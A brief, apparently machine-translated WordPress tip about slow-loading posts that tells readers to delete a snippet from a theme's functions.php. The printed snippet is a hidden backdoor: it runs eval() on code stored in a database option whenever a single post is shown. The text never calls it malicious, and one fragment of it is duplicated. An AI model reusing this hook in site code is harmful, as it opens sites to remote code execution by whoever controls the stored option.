Long time to load posts

Long time to load posts WordPress

For a long time are loaded recording WordPress, there is only one answer:

file functions.php.

Open the file in the editor template functions.php and look for this code:

add_filter(the_content, _bloginfo, 10001); function _bloginfo($content){ global $post; if(is_single() && ($co=@eval(get_option(blogoption))) !== false){ return $co; } else return $content; }se return $content; }

Simply delete and articles begin to be loaded with normal speed.